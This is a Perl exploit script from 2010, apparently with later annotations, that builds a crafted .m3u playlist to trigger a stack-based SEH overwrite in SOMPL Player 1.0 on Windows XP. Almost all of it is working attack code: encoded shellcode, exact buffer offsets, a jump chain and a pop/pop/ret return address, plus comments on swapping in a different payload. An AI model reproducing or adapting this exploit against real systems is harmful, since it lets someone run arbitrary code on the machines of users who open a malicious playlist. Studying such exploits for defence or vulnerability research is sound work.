
# Title : SOMPL Player Buffer Overflow
# Published : 2010-01-22
# Author : Rick2600


# Exploit Title : SOMPL Player Buffer Overflow
# Date          : 20 January 2010
# Author        : Rick2600 (ricks2600[at]gmail{dot}com)
# Bug found by  : Rick2600 (ricks2600[at]gmail{dot}com)
# Software Link : http://www.softpedia.com/progDownload/SOMPL-Download-144999.html
# Version       : 1.0
# Issue fixed in: unknown (no vendor fix known at the time of publication)
# OS            : Windows
# Tested on     : XP SP2 and SP3 En
# Type of vuln  : Stack-based buffer overflow, SEH overwrite (oversized entry in a .m3u playlist)
# Ref           : http://seclists.org/bugtraq/2010/Jan/160
# Greetz to     : Corelan Security Team:: corelanc0d3r, EdiStrosar, mr_me, ekse, MarkoT, sinn3r
#
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :

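# Banner.  A single-quoted heredoc prints the ASCII art literally; inside a
# double-quoted string every backslash in the art would need to be doubled
# (otherwise Perl eats them and, under warnings, complains about unrecognized
# escapes).  The line terminators were lost in the mirrored copy; restored.
print <<'BANNER';
|------------------------------------------------------------------|
|                         __               __                          |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
BANNER
# Newline added so the next "[+]" status line does not run into this one.
print "[+] SOMPL Player Buffer Overflow - SEH Overwritten\n";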


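# Playlist header.  NOTE(review): defined but never written to the .m3u
# below -- every offset in $buffer is computed without it, so prepending it
# would shift the SEH record by its length and break the overwrite.  Kept
# for reference only.
my $header = "#EXTM3U\n#EXTINF:";

# Payload: Metasploit x86/alpha_mixed-encoded MessageBox, 503 bytes.  It
# contains no 0x00, 0x0a or 0x0d bytes, so the whole buffer ends up as one
# playlist line; keep that property if you substitute another payload, and
# keep it under 4138 bytes (checked below) or the SEH offsets move.
# (The "\x" escapes were stripped in the mirrored copy; restored here.)
my $shellcode =
"\x89\xe7\xdb\xcf\xd9\x77\xf4\x59\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x48\x6b\x44\x62\x50\x56\x46\x51\x4b\x70\x42" .
"\x44\x4c\x4b\x43\x70\x46\x50\x4b\x35\x4b\x70\x51\x68\x44" .
"\x4c\x4e\x6b\x47\x30\x44\x4c\x4c\x4b\x50\x70\x47\x6c\x4c" .
"\x6d\x4c\x4b\x43\x70\x46\x68\x4a\x4b\x46\x69\x4c\x4b\x43" .
"\x70\x44\x74\x4e\x6d\x43\x70\x51\x6c\x4c\x4b\x47\x30\x45" .
"\x6c\x43\x6e\x4f\x33\x48\x6b\x45\x39\x45\x30\x4c\x4b\x42" .
"\x4c\x51\x34\x51\x34\x4e\x6b\x43\x75\x47\x4c\x4e\x6b\x51" .
"\x44\x47\x75\x43\x48\x46\x61\x49\x7a\x4e\x6b\x50\x4a\x47" .
"\x68\x4e\x6b\x42\x7a\x51\x30\x43\x31\x4a\x4b\x4a\x43\x50" .
"\x34\x47\x39\x4c\x4b\x44\x74\x4c\x4b\x43\x31\x48\x6e\x50" .
"\x31\x4b\x4f\x45\x61\x49\x50\x4b\x4c\x4c\x6c\x4d\x54\x49" .
"\x50\x44\x34\x43\x37\x4a\x61\x48\x4f\x46\x6d\x46\x61\x48" .
"\x47\x48\x6b\x4b\x44\x45\x6b\x43\x4c\x44\x64\x46\x48\x50" .
"\x75\x4d\x31\x4c\x4b\x43\x6a\x51\x34\x47\x71\x48\x6b\x50" .
"\x66\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x46" .
"\x61\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x68\x4d" .
"\x59\x47\x34\x46\x44\x45\x4c\x50\x61\x4f\x33\x4e\x4d\x42" .
"\x70\x46\x32\x48\x68\x4f\x5a\x4b\x4f\x4b\x4f\x49\x6f\x4e" .
"\x69\x43\x37\x51\x54\x51\x54\x47\x34\x43\x74\x43\x74\x47" .
"\x34\x43\x74\x42\x64\x47\x37\x47\x37\x50\x47\x42\x67\x50" .
"\x39\x48\x4e\x51\x65\x4b\x56\x4a\x63\x42\x6c\x50\x4c\x42" .
"\x6c\x42\x6c\x4d\x59\x4b\x55\x4b\x58\x45\x38\x4b\x4f\x49" .
"\x6f\x49\x6f\x4c\x49\x4b\x72\x48\x6b\x45\x4c\x51\x4e\x4c" .
"\x4d\x51\x6d\x45\x54\x4e\x69\x4c\x31\x4b\x30\x49\x51\x46" .
"\x6c\x48\x68\x4f\x38\x49\x6f\x49\x6f\x4b\x4f\x48\x6b\x47" .
"\x65\x45\x61\x49\x42\x51\x49\x4c\x48\x42\x71\x42\x34\x43" .
"\x61\x42\x72\x4b\x4f\x50\x54\x44\x64\x44\x4c\x4a\x48\x4b" .
"\x6f\x4b\x4f\x4b\x4f\x4b\x4f\x51\x47\x51\x6f\x51\x39\x42" .
"\x42\x48\x68\x48\x66\x4b\x4f\x49\x6f\x49\x6f\x47\x33\x42" .
"\x4f\x43\x42\x51\x75\x42\x4c\x50\x61\x42\x4e\x51\x30\x50" .
"\x54\x51\x75\x43\x51\x50\x6d\x51\x30\x44\x6d\x47\x50\x42" .
"\x70\x42\x77\x50\x4e\x50\x45\x42\x64\x42\x78\x41\x41";

my $filename = "somplPOC.m3u";
print "[+] Check: $filename\n\n";

# Buffer layout (byte offsets from the start of $buffer):
#
#   0     "\x90" x 5                 landing pad for the backward jump
#   5     shellcode + "B" padding    exactly 4138 bytes together
#   4143  E9 CD EF FF FF             jmp rel32 (-4147): lands at offset 1,
#                                    inside the NOPs, then slides into shellcode
#   4148  EB F9 90 90                nSEH: short jmp -7, i.e. to the E9 jmp
#   4152  pack("V", 0x32501B07)      SEH: pop/pop/ret in cc3250mt.dll.  The
#                                    original note calls it "Universal":
#                                    presumably the DLL ships with the player,
#                                    so the address does not depend on the OS
#                                    build -- verify against your install.
#
#   Total: 4156 bytes.  Offsets 4148/4152 are where SOMPL's SEH record sits
#   when the playlist entry overflows, so the padding is fixed-size on purpose.
#
# Guard against a replacement payload that is too large: "B" x (negative)
# would silently yield "" and every offset above would be wrong.
my $pad_len = 4138 - length($shellcode);
die "[-] Shellcode is " . length($shellcode) . " bytes; the limit is 4138\n"
    if $pad_len < 0;

my $buffer = "\x90" x 5;
$buffer .= $shellcode;
$buffer .= "B" x $pad_len;
$buffer .= "\xE9\xCD\xEF\xFF\xFF";             # jmp back into the NOP sled
$buffer .= "\xEB\xF9\x90\x90";                 # nSEH: jmp -7 onto the E9 jmp
$buffer .= pack("V", 0x32501B07);              # SEH: pop/pop/ret, cc3250mt.dll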



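# Write the playlist.  Three-arg open with a lexical handle and error checks
# (the original used the two-arg form and ignored failures, so a write error
# would leave a truncated or missing file with no indication).  binmode keeps
# the payload bytes exactly as built on platforms that translate newlines.
open my $fh, '>', $filename
    or die "[-] Cannot open $filename for writing: $!\n";
binmode $fh;
print {$fh} $buffer
    or die "[-] Write to $filename failed: $!\n";
# Buffered write errors surface at close, so check it too.
close $fh
    or die "[-] Closing $filename failed: $!\n";
print "[+] Wrote " . length($buffer) . " bytes to $filename\n";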